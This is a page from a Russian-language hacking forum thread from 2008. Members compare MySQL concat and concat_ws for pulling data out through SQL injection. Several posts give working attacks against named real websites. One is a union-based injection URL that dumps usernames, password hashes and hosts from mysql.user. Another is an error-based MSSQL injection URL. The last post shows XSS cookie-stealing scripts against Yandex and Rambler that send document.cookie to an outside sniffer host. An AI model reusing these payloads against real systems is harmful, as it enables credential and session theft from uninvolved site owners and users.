HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #751  
Старый 21.01.2008, 02:28
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

использовать concat, а не concat_ws
=)
 
Ответить с цитированием

  #752  
Старый 21.01.2008, 02:30
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

Цитата:
Сообщение от Spyder  
использовать concat, а не concat_ws
=)
я же написал, что там есть пустые поля и concat возвращает null
 
Ответить с цитированием

  #753  
Старый 21.01.2008, 02:34
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

я чё-то не понял наверное
select concat(col1,':',col2,':',col3) from table limit 0,1
предположим что у тебя колонка col2 имеет значение null
функция вернёт тебе
blabla1::blabla3

Да и concat_ws тоже самое вернёт вроде
щас тебе в асю стукну
 
Ответить с цитированием

  #754  
Старый 21.01.2008, 02:39
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

неа, я сейчас посмотрел Piflit правильно говорит, у меня вот как получилось:

Цитата:
SELECT concat_ws(':','ff',if (username <> '',username,'null')) FROM `user`
попробуй сам, у меня мускул 5, если функция concat получает хоть одно значение null, то возвращает null

например:
SELECT concat(':','ff',null) FROM `user` вернет null
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 21.01.2008 в 02:45..
 
Ответить с цитированием

  #755  
Старый 21.01.2008, 02:45
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

Piflit (01:42:38 21/01/2008)
среди этих полей есть нулл и весь конкат возвращает нулл - а дожен результат запроса

Piflit (01:42:58 21/01/2008)
а про конкат_вс поля едут - а мне надо выводить это в ровную табличку
 
Ответить с цитированием

  #756  
Старый 21.01.2008, 02:49
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

ну тогда делай по аналогии с моим примером, или дай структуру, ну вобщем поконкретней опиши, я наверное смогу помочь в этом вопросе
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #757  
Старый 21.01.2008, 02:56
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

http://biophysics.asu.edu/banf/show_files.php?user_id=-3+union+select+concat(user,':',password,':',host), 2,3+from+mysql.user+limit+2,1

здесь колонка password вернула null
всё выводится
зачем вам самим null подстовлять в функцию?
 
Ответить с цитированием

  #758  
Старый 21.01.2008, 03:14
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

незнаю, пробую на phpmyadmin, null подставляю сам просто для примера, пробую на реально существующей таблице, в которой есть значение null, concat выдает null, хм вот сейчас посмотрел mysql.user поле password у пользователя root, пустое, но не null, при этом concat действительно работает как говорит Spyder, а есть еще одна табличка там конкретно прописано, что значение поля username null, при выборке из этой таблички и этого поля concat выдает null, а concat_ws игнорирует, так как говорил Piflit

Скорее всего это связано с типами полей, хотя хз
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 21.01.2008 в 03:36..
 
Ответить с цитированием

  #759  
Старый 21.01.2008, 11:55
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

2PunkAss извини не было времени посмотреть, но вобщем то вот как твои проблеммы решаются:
Код:
http://cleverclub.nashe.ru/rating_d.asp?sender=1'/**/or/**/cast(@@version/**/as/**/int)='1
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #760  
Старый 21.01.2008, 14:56
frigid20
Новичок
Регистрация: 19.01.2008
Сообщений: 19
Провел на форуме:
71644

Репутация: 11
По умолчанию

уязвимость http://images.yandex.ru/
поиск ввожу </script><script>alert(document.cookie)</script> и появляется алерт пытаюсь сделать скрипт типа <script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script> тогда ничего не происходит он просто пытается это найти. как правильно использовать данную ксс?
----------------------------------------
на рамблере
ксс http://www.rambler.ru/db/support/feedback.shtml?name="<script >alert()</script>выводит алерт
пытался сделать скрипт типа <script img src="http://s.netsec.ru/mda.gif"> но мне на сниффер приходило только
Time: 20.01 -10.35.48
IP: 80.64.91.1
Host: http://www.rambler.ru/db/support/feedback.shtml?name="<script src="http://s.netsec.ru/frigid20.gif?" document.cookie;></script>
Browser: Mozilla/5.0
как правильно использовать данный ксс?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ